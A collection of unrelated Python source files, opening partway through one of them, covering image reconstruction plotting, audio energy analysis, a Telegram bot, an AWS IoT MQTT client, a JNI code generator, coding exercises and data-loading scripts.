    plt.title('u0' + ', siim:{:.2f}'.format(SSIM0) + ', psnr:{:.2f}'.format(PSNR0))
    plt.colorbar()
    plt.subplot(2, 2, 2)
    plt.imshow(u_true[0, 0, :, :], clim=(0, 1))
    plt.title('u_true')
    plt.colorbar()
    plt.subplot(2, 2, 3)
    plt.imshow(u1[0, 0, :, :], clim=(0, 1))
    plt.title('PM(u0)' + ', siim:{:.2f}'.format(SSIM1) + ', psnr:{:.2f}'.format(PSNR1))
    plt.colorbar()
    plt.subplot(2, 2, 4)
    plt.imshow(uk[0, 0, :, :], clim=(0, 1))
    uk_title_str = 'u' + str(k + 1) + ', siim:{:.2f}'.format(SSIM) + ', psnr:{:.2f}'.format(PSNR)
    plt.title(uk_title_str)
    plt.colorbar()
    plt.show()
    end_time = time.time()
    t_iter = end_time - start_time
    # compute Relative Error, SSIM and PSNR
    print(
        '%d relerr: %.3e PSNR: %.3e SSIM: %.3e time: %.3f'
        % (k+1, relerr, PSNR, SSIM, t_iter))
# create and save gray image of the final iterate (rotated for display)
cmap = 'gray'
fig = plt.figure()
plt.imshow(np.rot90(uk[0,0,:,:].detach().cpu().numpy()),cmap=cmap)
plt.axis('off')
save_loc = './saved_images/adv_proj_ellipse_ind' + str(ind_val1) + '.pdf'
plt.savefig(save_loc,bbox_inches='tight')
plt.show()
# plt.close(fig)
|
import signin
import requests
import config
import problem
from bs4 import BeautifulSoup
def get_problem_list(cookies):
    """Scrape the DOMjudge jury problem table and download every problem.

    cookies -- authenticated session cookies (see signin.load_cookies).
    Each table row's second column presumably holds the problem id passed
    to problem.get -- verify against the live page markup.
    """
    url = config.base_url + "domjudge2/pctjury/pctproblems.php"
    r = requests.get(url, cookies=cookies)
    soup = BeautifulSoup(r.text, "lxml")
    # skip the two header rows of the table
    tr = soup.find_all("tr")[2:]
    # [display name, problem id] per row
    lists = [ [x.td.a.text, x.td.next.next.next.a.text ] for x in tr]
    lists.sort()
    for x in lists:
        problem.get(x[1])
if __name__ == "__main__":
    cookies = signin.load_cookies()
    get_problem_list(cookies)
|
# ---------------------------------------------------------------------------------------------------------------------#
from scipy.io import wavfile
import numpy as np
import math
# ---------------------------------------------------------------------------------------------------------------------#
def location(arg1):
    """Return the indices of all non-zero entries of the sequence arg1."""
    return [idx for idx, value in enumerate(arg1) if value != 0]
# ---------------------------------------------------------------------------------------------------------------------#
# Input file and framing parameters for short-term energy analysis.
audio_file = "F:\Projects\Active Projects\Project Intern_IITB\Rough_Space_5\InputTestFile.wav"
window_dur = 30  # Duration of window in milliseconds
hop_dur = 10  # Hop duration in milliseconds
fs, data = wavfile.read(audio_file)  # Reading data from wav file in an array
# NOTE(review): assumes 16-bit PCM input -- verify; other sample widths
# would need a different normalization constant.
data = data / float(2 ** 15)  # Normalizing it to [-1,1] range from [-2^15,2^15]
window_size = int(window_dur * fs * 0.001)  # Converting window length to samples
hop_size = int(hop_dur * fs * 0.001)  # Converting hop length to samples
window_type = np.hamming(window_size)  # Window type: Hamming (by default)
no_frames = int(math.ceil(len(data) / (float(hop_size))))  # Determining the number of frames
zero_array = np.zeros(window_size)  # Appending appropriate number of zeros
data = np.concatenate((data, zero_array))
length = len(data)  # Finding length of the padded data
# ---------------------------------------------------------------------------------------------------------------------#
# ---------------------------------------------------------------------------------------------------------------------#
noise_energy = 0
energy = [0] * length
# Squaring each data point
for j in range(length):
    energy[j] = data[j] * data[j]
# Calculating noise energy: average energy of the first 800 samples,
# presumably assumed to be silence/background -- verify for other inputs.
for j in range(0, 800):  # energy
    noise_energy += energy[j]
noise_energy /= 800
# ---------------------------------------------------------------------------------------------------------------------#
# ---------------------------------------------------------------------------------------------------------------------#
st_energy = [0] * no_frames
maximum = [0] * no_frames
frame_number = [0] * no_frames
start = [0] * no_frames
stop = [0] * no_frames
# Calculating frame wise short term energy (Hamming-windowed sum of squares)
for i in range(no_frames):
    frame = data[i * hop_size:i * hop_size + window_size] * window_type
    frame_number[i] = i
    start[i] = i * hop_size
    stop[i] = i * hop_size + window_size
    st_energy[i] = sum(frame ** 2)
# ---------------------------------------------------------------------------------------------------------------------#
# ---------------------------------------------------------------------------------------------------------------------#
# Peak picking: peak[j] holds st_energy[j] at local maxima, 0 elsewhere,
# so len(peak) == no_frames and indices align with frames.
peak = []
for j in range(no_frames):
    if j == 0:
        if st_energy[j] > st_energy[j + 1]:
            peak.append(st_energy[j])
        else:
            peak.append(0)
    elif j == no_frames - 1:
        if st_energy[j] > st_energy[j - 1]:
            peak.append(st_energy[j])
        else:
            peak.append(0)
    else:
        if st_energy[j] > st_energy[j + 1] and st_energy[j] > st_energy[j - 1]:
            peak.append(st_energy[j])
        else:
            peak.append(0)
# ---------------------------------------------------------------------------------------------------------------------#
# Finding the valleys (local minima of the short-term energy contour).
# BUG FIX: the original code appended the 0 placeholders to `peak` instead of
# `valley` in every else-branch (copy-paste from the peak loop above). That
# both corrupted `peak` with extra trailing zeros and left `valley` shorter
# than no_frames, so location(valley) returned misaligned frame indices.
valley = []
for j in range(no_frames):
    if j == 0:
        if st_energy[j] < st_energy[j + 1]:
            valley.append(st_energy[j])
        else:
            valley.append(0)
    elif j == no_frames - 1:
        if st_energy[j] < st_energy[j - 1]:
            valley.append(st_energy[j])
        else:
            valley.append(0)
    else:
        if st_energy[j] < st_energy[j + 1] and st_energy[j] < st_energy[j - 1]:
            valley.append(st_energy[j])
        else:
            valley.append(0)
# ---------------------------------------------------------------------------------------------------------------------#
location_peak = location(peak)
location_valley = location(valley)
# NOTE: Python 2 print statements -- this script targets Python 2.
print "Number of peaks :", len(location_peak)
print "Number of valleys :", len(location_valley)
# ---------------------------------------------------------------------------------------------------------------------#
# Keep copies of the raw (unfiltered) peak/valley data.
peak_1 = peak[:]
valley_1 = valley[:]
location_peak_1 = location_peak[:]
location_valley_1 = location_valley[:]
# ---------------------------------------------------------------------------------------------------------------------#
# Threshold combining background noise energy and mean peak energy.
threshold = 0.04 * (noise_energy + (sum(peak) / len(location_peak_1)))
# ---------------------------------------------------------------------------------------------------------------------#
# NOTE(review): this zeroes peaks ABOVE the threshold; usual practice is to
# discard peaks BELOW a threshold -- confirm the comparison direction.
for j in range(len(peak)):
    if threshold < peak[j]:
        peak.pop(j)
        peak.insert(j, 0)
# Suppress peaks dominated by a larger peak within the next 10 frames.
# NOTE(review): `is not 0` is an identity check that only works for the int 0
# placeholders under CPython's small-int caching; `!= 0` is the robust form.
for j in range(len(peak) - 10):
    if peak[j] is not 0:
        for i in range(1, 10):
            if peak[j] < peak[j + i]:
                peak.pop(j)
                peak.insert(j, 0)
location_peak = location(peak)
location_valley = location(valley)
# ---------------------------------------------------------------------------------------------------------------------#
peak_2 = peak[:]
valley_2 = valley[:]
location_peak_2 = location_peak[:]
location_valley_2 = location_valley[:]
# ---------------------------------------------------------------------------------------------------------------------#
# NOTE(review): this assignment shadows the location() function defined
# above; any later call to location(...) would raise TypeError.
location = location_peak + location_valley
location.sort()
ripple = []
# for k in range(len(location_peak)):
#     q = location.index(location_peak[k])
#     print q
# #     ripple.append(location[q-1])
# #     ripple.append(location[q])
# #     ripple.append(location[q+1])
# # #
# # # ripple_value = []
# # for k in range(1, len(ripple), 3):
# #     ripple_value.append((st_energy[ripple[k]]-st_energy[ripple[k+1]])/(st_energy[ripple[k]]-st_energy[ripple[k-1]]))
# #
# # for q in range(len(ripple_value)-1):
# #     if ((ripple_value[q] > 3) and (ripple_value[q+1] < 1.4)) or ((ripple_value[q] > 1.02) and (ripple_value[q+1] < 0.3)):
# #         if peak[location_peak[q]] > peak[location_peak[q+1]]:
# #             peak.pop(location_peak[q+1])
# #             peak.insert(location_peak[q+1], 0)
# #
# #         if peak[location_peak[q]] < peak[location_peak[q + 1]]:
# #             peak.pop(location_peak[q])
# #             peak.insert(location_peak[q], 0)
|
def excel_column_number(s):
    """Convert an Excel column label such as 'A', 'Z', 'AA' to its 1-based number."""
    # Horner's scheme in base 26, scanning left to right.
    total = 0
    for ch in s:
        total = total * 26 + (ord(ch) - ord('A') + 1)
    return total
#print(excel_column_number('AA'), excel_column_number('ZA'), excel_column_number('AAA'))
# Puzzle: interpret the words as base-26 column numbers and divide them.
coolshell = excel_column_number('COOLSHELL')
shell = excel_column_number('SHELL')
print('coolshell = ', coolshell, 'shell = ', shell)
print('coolshell / shell = ', coolshell / shell) # 85165, cool, but you should convert the number back to a column string!
def excel_column(n):
    """Convert a 1-based column number back to its Excel label ('A'..'Z', 'AA', ...).

    BUG FIX: the original special-cased only n == 26 and otherwise used
    divmod(n, 26), which produces chr(64) ('@') for every other multiple of
    26 (e.g. 52 -> 'A@' instead of 'AZ'). Bijective base-26 is handled
    uniformly by shifting to 0-based digits with divmod(n - 1, 26).
    """
    ret = ''
    while n > 0:
        n, r = divmod(n - 1, 26)  # r in 0..25 maps to 'A'..'Z'
        ret = chr(r + ord('A')) + ret
    return ret
#print(excel_column(1), excel_column(27), excel_column(677))
# Convert the quotient back into a column label to reveal the answer word.
ans = excel_column(85165)
print('85165: ', ans) # DUYO
print('answer is ', ans.lower())
|
#coding:utf-8
# Affine transformation demo.
# In an affine transform, all parallel lines in the original image remain
# parallel in the output image. To find the transformation matrix we need
# three points in the input image and their corresponding positions in the
# output image; cv.getAffineTransform then builds the 2x3 matrix that is
# passed to cv.warpAffine.
import cv2 as cv
import numpy as np
img = cv.imread('D:/python_file/Opencv3_study_file/images/!face.png')
rows,cols,ch = img.shape
# three reference points before the transform
pts1 = np.float32([[50,50],[200,50],[50,200]])
# the same three points after the transform
pts2 = np.float32([[10,100],[200,50],[100,250]])
M = cv.getAffineTransform(pts1,pts2)
dst = cv.warpAffine(img,M,(cols,rows))
cv.imshow('OUTPUT',dst)
cv.waitKey(0)
cv.destroyAllWindows() |
import requests
import xml.etree.ElementTree as ET
from telegram import KeyboardButton
import regex
import random
from stuff import feels, ssHeaders, emotions
import sqlite3
from config import DB_FILE
def generateKeyboard():
    """Build a Telegram keyboard with one button per upcoming Finnkino movie.

    Fetches the 'ComingSoon' events XML feed and creates a KeyboardButton
    for every <Title> element found.
    """
    events = "https://www.finnkino.fi/xml/Events/?listType=ComingSoon&includeVideos=false"
    s = requests.Session()
    res = s.get(events)
    root = ET.fromstring(res.text)
    keyboard = []
    for child in root:
        for i in child:
            if i.tag == "Title":
                keyboard.append(KeyboardButton(i.text))
    return keyboard
def getMovie(name):
    """Return the local release date of the named upcoming Finnkino movie.

    name -- exact movie title as it appears in the Finnkino XML feed.
    Returns the text of the <dtLocalRelease> element that follows the
    matching <Title>, or the Finnish "not found" message otherwise.
    """
    events = "https://www.finnkino.fi/xml/Events/?listType=ComingSoon&includeVideos=false"
    s = requests.Session()
    res = s.get(events)
    root = ET.fromstring(res.text)
    movieFound = False
    for child in root:
        for i in child:
            # removed unused `debug`/`debug2` locals from the original
            if i.tag == "Title" and i.text == name:
                movieFound = True
            # relies on <dtLocalRelease> appearing after <Title> within the
            # same event element -- matches the feed's element order
            if i.tag == "dtLocalRelease" and movieFound:
                return i.text
    return "Ensi-iltaa ei löytynyt"
def getImage():
    """Return the URL of a random Shutterstock stock image, or "" on no match.

    Randomly searches either a "<feeling>+<person>" query or a plain emotion
    query, then picks one image URL from the result page.
    """
    rng = random.randint(0,1)
    if rng == 0:
        feeling = random.choice(feels) + "+" + random.choice(["man", "men", "woman", "women", "boy", "boys", "girl", "girls"])
        url = "https://www.shutterstock.com/fi/search/"+feeling
    else:
        url = "https://www.shutterstock.com/fi/search/" + random.choice(emotions)
    res = requests.get(url, headers=ssHeaders, timeout=3)
    # BUG FIX: the original pattern used a character class
    # [(?:photo)(?:vector)]+, which matches any run of the characters
    # "()?:photovecr" rather than the words "photo"/"vector"; use a real
    # non-capturing alternation instead.
    re = regex.compile(r'src="(https://image.shutterstock.com/image-(?:photo|vector)/.+?)"')
    imageList = re.findall(res.text)
    if imageList:
        imgUrl = random.choice(imageList)
        return imgUrl
    else:
        return ""
def dbQuery(query, params=()):
    """Execute one SQL statement against DB_FILE and return all result rows.

    query  -- SQL text, may contain '?' placeholders
    params -- parameter tuple bound to the placeholders (default: none)

    Returns cur.fetchall() (empty list for statements with no result set).
    """
    conn = sqlite3.connect(DB_FILE)
    try:
        cur = conn.cursor()
        # execute() accepts an empty parameter tuple, so the original
        # `if len(params) == 0` branch was unnecessary.
        cur.execute(query, params)
        res = cur.fetchall()
        # BUG FIX: commit before closing -- without this, any INSERT/UPDATE/
        # DELETE issued through this helper was rolled back on close().
        conn.commit()
    finally:
        # close the connection even when execute() raises
        conn.close()
    return res
def create_tables():
    """Create the bot's SQLite tables in DB_FILE if they do not exist yet."""
    conn = sqlite3.connect(DB_FILE)
    c = conn.cursor()
    c.execute('''CREATE TABLE IF NOT EXISTS substantiivit ("sub" text)''')
    c.execute('''CREATE TABLE IF NOT EXISTS pinned ("date" text, "name" text, "text" text)''')
    c.execute('''CREATE TABLE IF NOT EXISTS sananlaskut ("teksti" text)''')
    c.execute('''CREATE TABLE IF NOT EXISTS adjektiivit ("adj" text)''')
    c.execute('''CREATE TABLE IF NOT EXISTS quotes (
                "date" TEXT DEFAULT CURRENT_TIMESTAMP,
                "quotee" TEXT,
                "quote" TEXT,
                "adder" TEXT,
                "groupID" INT,
                PRIMARY KEY(quotee, quote, groupID)
                )
                ''')
    # Explicit commit so the DDL is durable regardless of the connection's
    # isolation-level/implicit-transaction behavior.
    conn.commit()
    conn.close()
def build_menu(buttons,
               n_cols,
               header_buttons=None,
               footer_buttons=None):
    """Arrange buttons into rows of n_cols, with optional header/footer rows.

    header_buttons / footer_buttons, when given, each become a one-element
    row prepended/appended to the grid.
    """
    menu = []
    for start in range(0, len(buttons), n_cols):
        menu.append(buttons[start:start + n_cols])
    if header_buttons:
        menu.insert(0, [header_buttons])
    if footer_buttons:
        menu.append([footer_buttons])
    return menu
|
import os
import gdown
import zipfile
#url = 'https://drive.google.com/file/d/1CmrRt4Uyl3lGTgYKMWkouzfGPU_W47Nj/view?usp=sharing'
# Direct-download form of the Google Drive link above (same file id).
URL = 'https://drive.google.com/uc?id=1CmrRt4Uyl3lGTgYKMWkouzfGPU_W47Nj'
OUTPUT = '../DATASET/modelamiento.zip'
DATA_PATH = '../DATASET/'
# Download the zip only if it is not already present locally.
if not os.path.exists(OUTPUT):
    print('download file')
    gdown.download(URL,OUTPUT, quiet=False)
else:
    print('modelamiento.zip already exists')
# Extract only if the expected unpacked folder does not exist yet.
if not os.path.exists(os.path.join(DATA_PATH,'NEW_DATASET')):
    with zipfile.ZipFile(OUTPUT, 'r') as zip_ref:
        zip_ref.extractall(DATA_PATH)
print('Finished success') |
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
import time
loop = True;
def customCallback(client, userdata, message):
    """MQTT subscribe callback: log the message, acknowledge, stop the main loop.

    Publishes an acknowledgement on "myTopicPublish" and clears the
    module-level `loop` flag so the `while loop:` at the bottom of the
    script exits.
    """
    # BUG FIX: without the global declaration the assignment below created a
    # local variable, so the module-level `loop` was never cleared and the
    # main `while loop:` spin never terminated.
    global loop
    print("Received a new message: ")
    print(message.payload)
    print("from topic: ")
    print(message.topic)
    myMQTTClient.publish("myTopicPublish", "Chris Recived", 0)
    print("--------------\n\n")
    loop = False
# Configure the AWS IoT MQTT client (client id, endpoint, TLS credentials).
myMQTTClient = AWSIoTMQTTClient("Chris_Macbook")
myMQTTClient.configureEndpoint("a1g9fizbnjxy2u.iot.us-west-2.amazonaws.com", 443)
myMQTTClient.configureCredentials("/Users/yuxuanwu/Desktop/IoT/Amazon_Root_CA_1.pem", "/Users/yuxuanwu/Desktop/IoT/cf09431bee-private.pem.key", "/Users/yuxuanwu/Desktop/IoT/cf09431bee-certificate.pem.crt")
# For Websocket, we only need to configure
myMQTTClient.configureOfflinePublishQueueing(-1)  # Infinite offline Publish queueing
myMQTTClient.configureDrainingFrequency(2)  # Draining: 2 Hz
myMQTTClient.configureConnectDisconnectTimeout(10)  # 10 sec
myMQTTClient.configureMQTTOperationTimeout(5)  # operation timeout in seconds
myMQTTClient.connect()
#myMQTTClient.publish("myTopic", "Chris IoT Test", 0)
# Subscribe at QoS 1; customCallback clears `loop` when a message arrives.
myMQTTClient.subscribe("myTopicListen", 1, customCallback)
# Idle until the callback signals completion.
while loop:
    time.sleep(1)
|
class MethodNode:
    """Describes one Java method and renders the C++/JNI glue code for it.

    methodInfo is a dict with keys 'modifiers', 'result', 'params' and
    'paramsType' -- presumably produced by a Java-parser stage; the type
    objects are expected to provide toString/getHeaders/isVoid/
    typeJNISignature/toCPPJType/typePack/typeUnpack etc. (verify against
    the type-node implementation).
    """
    def __init__(self, name, methodInfo, className, classMapping=None):
        self._name = name
        self._methodInfo = methodInfo
        self._className = className
        self._classMapping = classMapping
    def getJNIName(self):
        """Name of the cached jmethodID member variable for this method."""
        return u"j" + self._name + "_"
    def isPublic(self):
        """True if the Java method has the `public` modifier."""
        return "public" in self._methodInfo['modifiers']
    def isStatic(self):
        """True if the Java method has the `static` modifier."""
        return "static" in self._methodInfo['modifiers']
    def signature(self):
        """Render the C++ method declaration line (for the header file)."""
        res = self._methodInfo['result'].toString()
        if self.isStatic():
            res = u"static " + res
        res += u" " + self._name + u"("
        assert len(self._methodInfo['params']) == len(self._methodInfo['paramsType'])
        for i in range(len(self._methodInfo['params'])):
            res += self._methodInfo['paramsType'][i].toString() + u" " + self._methodInfo['params'][i]
            if i < len(self._methodInfo['params']) - 1:
                res += u", "
        res += u");"
        return res
    def headerIncludes(self):
        """Set of header files required by the result and parameter types."""
        res = self._methodInfo['result'].getHeaders()
        for t in self._methodInfo['paramsType']:
            res.update(t.getHeaders())
        return res
    def isVoid(self):
        """True if the Java method returns void."""
        return self._methodInfo['result'].isVoid()
    def bodyAndSignature(self):
        """Render the full C++ method definition that forwards to JNI.

        The body packs the C++ arguments into JNI types, invokes the cached
        jmethodID via the matching Call[Static]<Type>Method, and (for
        non-void methods) unpacks the JNI result back into a C++ value.
        """
        res = self._methodInfo['result'].toString()
        res += u" " + self._className + u"::" + self._name + u"("
        assert len(self._methodInfo['params']) == len(self._methodInfo['paramsType'])
        for i in range(len(self._methodInfo['params'])):
            res += self._methodInfo['paramsType'][i].toString() + u" " + self._methodInfo['params'][i]
            if i < len(self._methodInfo['params']) - 1:
                res += u", "
        res += u") {\n"
        res += self.getJNIPackArgs()
        if not self.isVoid():
            res += u"    " + self._methodInfo['result'].toCPPJType()
            res += " jres = "
        else:
            res += u"    "
        # CallObjectMethod returns jobject; strings need an explicit jstring cast
        if self._methodInfo['result']._type == "String":
            res += u"(jstring)"
        res += u"JNISingleton::env()->" + self.getJNIMethodCaller() + u"("
        if self.isStatic():
            res += u"jclass_,"
        else:
            res += u"jthis_, "
        res += self.getJNIName()
        for a in self._methodInfo['params']:
            res += ', ' + self.argToJ(a)
        res += u");\n"
        if not self.isVoid():
            res += self.getJNIUnpackResult()
        res += u"}"
        return res
    def getJNIMethodFindFunction(self):
        """JNIEnv lookup function matching the method's static-ness."""
        if "static" in self._methodInfo['modifiers']:
            return "GetStaticMethodID"
        else:
            return "GetMethodID"
    def getJNIMethodSignature(self):
        """Render the JNI type signature string, e.g. (ILjava/lang/String;)V.

        Non-primitive types are wrapped as L<name>; and arrays keep their
        leading '[' before the 'L' prefix.
        """
        res = u"("
        for arg in self._methodInfo["paramsType"]:
            isSimpleType = arg.isSimpleType()
            resT = arg.typeJNISignature()
            if not isSimpleType:
                if not arg.isArray():
                    res += "L" + resT
                else:
                    # array: '[' must precede the 'L' of the element type
                    res += resT[0] + "L" + resT[1:]
            else:
                res += resT
            if not isSimpleType:
                res += u";"
        res += u")"
        resSimple = self._methodInfo["result"].isSimpleType() or self._methodInfo["result"].isVoid()
        if not resSimple:
            res += u"L"
        res += self._methodInfo["result"].typeJNISignature()
        if not resSimple:
            res += u";"
        return res
    def getJNIMethodFindLine(self, intend=4):
        """Render the line that caches this method's jmethodID at init time."""
        res = u" " * intend
        res += self.getJNIName() + u" = JNISingleton::env()->"
        res += self.getJNIMethodFindFunction() + u"("
        res += u"jclass_, \"" + self._name + u"\", "
        res += u"\"" + self.getJNIMethodSignature() + u"\");\n"
        return res
    def getJNIUnpackResult(self, intend=4):
        """Render the lines converting the JNI result `jres` to C++ and returning it."""
        res = u" " * intend + self._methodInfo['result'].toString() + u" res;\n"
        res += self._methodInfo['result'].typeUnpack(u"jres", "res")
        res += u" " * intend + u"return res;\n"
        return res
    def argToJ(self, argName):
        """Name of the JNI-side variable corresponding to a C++ argument."""
        return u"j" + argName
    def getJNIPackArgs(self, intend=4):
        """Render declarations + conversions of all arguments to JNI types.

        NOTE(review): the indent string is emitted both before the type and
        before the variable name, producing `jtype     jname;` -- harmless
        but looks unintentional; confirm against the generated output.
        """
        res = u""
        intendStr = u" " * intend
        for i in range(len(self._methodInfo["paramsType"])):
            res += intendStr + self._methodInfo["paramsType"][i].toCPPJType() + u" "
            res += intendStr + self.argToJ(self._methodInfo["params"][i]) + u";\n"
            res += self._methodInfo["paramsType"][i].typePack(self.argToJ(self._methodInfo["params"][i]),
                                                             self._methodInfo["params"][i])
            res += u"\n"
        if self._methodInfo["paramsType"]:
            res += u"\n"
        return res
    def getJNIMethodCaller(self):
        """Name of the JNIEnv invoke function, e.g. CallStaticIntMethod."""
        res = u"Call"
        if self.isStatic():
            res += u"Static"
        res += self._methodInfo['result'].getJNIMethodReturnType()
        res += u"Method"
        return res
# File Objects
# method for opening files without a context manager (not recommended)
# when using this method we will ne to explicitly close it when done
# if you don't then you can end up with file leaks that run over the max file descriptors on system
# f = open("test.txt", "r") #if file isn't in the same directory then the full path will be needed
# print(f.name) # prints file name = test.txt
# print(f.mode) # prints the mode the file is open in = r
#
# f.close() # closes the file
# opening with a context manager - don't need to worry about closing
# Demonstration of reading with a context manager; the file is closed
# automatically when the `with` block exits.
with open("test.txt", "r") as f:  # --> f = open("test.txt", "r")
    # for line in f:
    #     print(line, end = "")  # this is memory efficient because it doesn't read the whole file at once
    # f_contents = f.read()  # .read reads the whole file
    # print(f_contents)  # prints the contents of the file
    # f_contents = f.readlines()  # .readlines produces a list of all the lines
    # f_contents = f.readline()  # grabs the first entry from a list of all the lines
    # print(f_contents)
    # if repeated with the same variable name it wil go on to the next index
    # but if given a new variable it will start over again
    # print statement needs to be repeated after each otherwise it will only print the last one
    # f_contents = f.read(100)  # first 100 characters of file
    # print(f_contents)
    # size_to_read = 10
    # f_contents = f.read(size_to_read)  # first 10 characters of file as set by variable
    # print(f.tell())  # what position we are in the file
    size_to_read = 10
    f_contents = f.read(size_to_read)  # first 10 characters of file as set by variable
    print(f_contents)
    f.seek(0)  # sets us back at 0 index
    f_contents = f.read(size_to_read)  # will start back at 0 because of .seek()
    print(f_contents)
    # while len(f_contents) > 0:
    #     print(f_contents, end = "*")  # will put in a * after every 10 characters
    #     f_contents = f.read(size_to_read)
# Outside the with block the file object still exists but is closed.
print(f.closed)  # True --> meaning you have to work with the file from within the with open
|
from os import linesep
file_list = ["p.py"]
def clear_file(filename):
    '''
    Strip trailing whitespace from the end of every line in the given file
    (docstring translated from Polish). Lines that had trailing whitespace
    beyond the line separator are reported with their 1-based line number.

    NOTE: this module uses Python 2 print statements.
    NOTE(review): the file is rewritten in text mode ('wt') while appending
    os.linesep explicitly -- on Windows (linesep == '\r\n') text mode
    translates the '\n' again, producing '\r\r\n'; writing '\n' in text
    mode would be the portable form. Confirm the target platform.
    '''
    new_lines = []
    with open(filename, 'rt') as ifile:
        lines = ifile.readlines()
    for (index, line) in enumerate(lines):
        newline = line.rstrip()
        # report lines where rstrip() removed more than just the separator
        if newline != line.rstrip(linesep):
            print "{}: {}".format(index+1, repr(line))
        new_lines.append(newline)
    with open(filename, 'wt') as ofile:
        for line in new_lines:
            ofile.write(line+linesep)
# Clean every file listed in file_list in place.
for f in file_list:
    clear_file(f)
|
import encodings
# Canonical registered name of the UTF-8 codec (i.e. "utf-8").
UTF8 = encodings.utf_8.getregentry().name
|
import pandas
from pandas import read_excel
from datetime import datetime
from ..models import Employee, Contact, UpdateLog, Department, Lecturer
def import_data(excel_filename):
    """Bulk-import lecturer records from an Excel sheet into MongoDB.

    excel_filename -- path to a workbook whose first row is the header; one
    lecturer per data row. Rows whose email already exists as an Employee
    are skipped. For each new row a Contact, an UpdateLog entry (attributed
    to the `added_by` employee) and a Lecturer document are created; the
    lecturer's photo is attached from the local path in the `photo` column
    when present.

    NOTE(review): department slugs and `added_by` emails are looked up but
    not validated -- a missing Department or adder silently stores None.
    """
    wb = read_excel(excel_filename, header=0)
    # replace pandas NaN with None so MongoEngine fields stay unset
    wb = wb.where(pandas.notnull(wb), None)
    for idx, row in wb.iterrows():
        email = row['email']
        if Employee.objects(email=email).first():
            continue  # skip existing employee
        first_name_en = row['first_name_en']
        last_name_en = row['last_name_en']
        first_name_th = row['first_name_th']
        last_name_th = row['last_name_th']
        dob = row['dob']
        employed_date = row['employed_date']
        department_slugs = row['department']
        photo_file = row['photo']
        building_name_en = row['building_name_en']
        building_name_th = row['building_name_th']
        building_campus_en = row['building_campus_en']
        building_campus_th = row['building_campus_th']
        building_address_en = row['building_address_en']
        building_address_th = row['building_address_th']
        office_number = row['office_number']
        cellphone = row['cellphone']
        academic_title = row['academic_title']
        degree = row['degree']
        added_by = row['added_by']
        phone_number = row['phone_number']
        # comma-separated list of phone numbers in one cell
        phone_number = str(phone_number).split(',') if phone_number else []
        adder = Employee.objects(email=added_by).first()
        contact = Contact(office_number=str(office_number),
                          phone_number=phone_number,
                          cellphone=str(cellphone),
                          building_name_en=building_name_en,
                          building_name_th=building_name_th,
                          building_campus_en=building_campus_en,
                          building_campus_th=building_campus_th,
                          building_address_en=building_address_en,
                          building_address_th=building_address_th)
        update = [UpdateLog(updated_by=adder)]
        departments = []
        for slug in department_slugs.split(','):
            departments.append(Department.objects(slug=slug).first())
        lecturer = Lecturer(first_name_en=first_name_en,
                            last_name_en=last_name_en,
                            first_name_th=first_name_th,
                            last_name_th=last_name_th,
                            email=email,
                            dob=dob,
                            employed_date=employed_date,
                            academic_title=academic_title,
                            highest_degree=degree,
                            contact=contact,
                            department=departments,
                            added_by=adder,
                            update_logs=update
                            )
        if photo_file:
            lecturer.photo.put(open(photo_file, 'rb'), content_type='image/jpg')
        lecturer.save()
|
# -*- coding: utf-8 -*-
from functools import lru_cache
class Solution:
    """LeetCode 115 -- Distinct Subsequences.

    Count the number of distinct subsequences of s that equal t.
    """

    def numDistinct(self, s: str, t: str) -> int:
        """Count distinct subsequences of s equal to t.

        Rewritten as bottom-up DP: O(len(s) * len(t)) time, O(len(t)) space,
        no recursion-depth limit and no cross-instance lru_cache growth.
        """
        # dp[j] = number of ways to form t[:j] from the prefix of s seen so far
        dp = [0] * (len(t) + 1)
        dp[0] = 1  # the empty target can always be formed exactly once
        for ch in s:
            # iterate j backwards so each character of s is consumed at most
            # once per target position within this round
            for j in range(len(t) - 1, -1, -1):
                if t[j] == ch:
                    dp[j + 1] += dp[j]
        return dp[len(t)]

    @lru_cache(maxsize=None)
    def _numDistinct(self, s: str, t: str, i: int, j: int) -> int:
        """Original top-down recursion, kept for backward compatibility.

        Return annotation fixed from `bool` to `int` (it returns a count).
        NOTE(review): lru_cache on an instance method keys on `self` and
        keeps every instance alive for the cache's lifetime (ruff B019) --
        prefer numDistinct above.
        """
        if i == len(s) and j < len(t):
            return 0
        elif j == len(t):
            return 1
        elif s[i] == t[j]:
            return self._numDistinct(s, t, i + 1, j) + self._numDistinct(
                s, t, i + 1, j + 1
            )
        return self._numDistinct(s, t, i + 1, j)
if __name__ == "__main__":
    # quick self-checks using the LeetCode 115 reference answers
    solution = Solution()
    assert 3 == solution.numDistinct("rabbbit", "rabbit")
    assert 5 == solution.numDistinct("babgbag", "bag")
|
from ft232h.wrapper import FT232
from ft232h.dll_h import *
from ft232h.spi import SPI
from ft232h.i2c import I2C
def list_info():
    """Print the device-info dict of every connected FTDI device of Type 8."""
    dev = FT232(None)
    infos = dev.get_devinfos()
    for i in infos:
        # Type == 8 presumably identifies FT232H devices in the D2XX
        # device list -- verify against the wrapper's documentation.
        if i['Type'] == 8:
            print(i)
def spi_test():
    """SPI smoke test: open at 1 MHz, mode 3, write 4 bytes and read 4 back."""
    spi = SPI()
    #spi speed 1M
    # spi config to mode 3
    spi.spi_open(1000000, 3, serialnum='FT0B0UCU')
    # spi write b'1234' and read back 4 bytes
    spi.SPI_WriteRead(b'1234',4)
def i2c_test():
    """I2C smoke test: open at 400 kHz, write 4 bytes then read 4 back."""
    i2c = I2C()
    #speed 400k
    i2c.i2c_open(400000)
    # i2c write b'1234' and read back 4 bytes to slave7bitaddr 0x82
    # (0x82 is the 8-bit address; shifting right yields the 7-bit address 0x41)
    i2c.i2c_FastWrite(0x82>>1, b'1234')
    rec = i2c.i2c_FastRead(0x82>>1, 4)
    print(rec)
if __name__ == '__main__':
    #list_info()
    #spi_test()
    # only the I2C smoke test runs by default
    i2c_test()
|
#%%
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
##### 2015 fine-dust (PM) dataset
data=pd.read_csv('2015_data.csv',encoding="cp949")  # load the CSV file
# print(data.tail())
data_seoul=data[data.Location.isin(['서울'])]  # keep only rows whose Location is Seoul
# print(data_seoul.tail())
# print(data_seoul.corr())  # correlation analysis
import seaborn as sns
# sns.set(font_scale=1.5)
# f, ax = plt.subplots(figsize=(20,10))
# heatmap via seaborn: annot=show each value; cmap RdBu_r = red positive, blue negative
# sns_heatmap=sns.heatmap(data_seoul.corr(),annot=True, fmt=".2f", linewidths=.5, cmap="RdBu_r")
###### weather dataset
data=pd.read_csv('total_weather.csv', encoding="cp949")
# print("total number of rows", len(data))
# print(data.tail())
data_seoul=data[data.Location.isin(['서울'])]
